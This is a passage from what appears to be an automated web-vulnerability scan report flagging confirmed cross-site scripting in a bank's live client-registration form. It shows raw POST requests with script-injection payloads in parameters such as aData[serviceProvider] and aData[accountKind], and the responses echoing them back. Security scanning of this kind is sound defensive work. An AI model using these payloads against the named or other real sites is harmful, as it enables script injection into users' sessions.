&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot;  onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000186)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BserviceProvider%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00018A)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 330
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BserviceProvider%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00018A)%3c%2fscript%3e&amp;aData%5BservProviderAnswer%5D=Yes&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
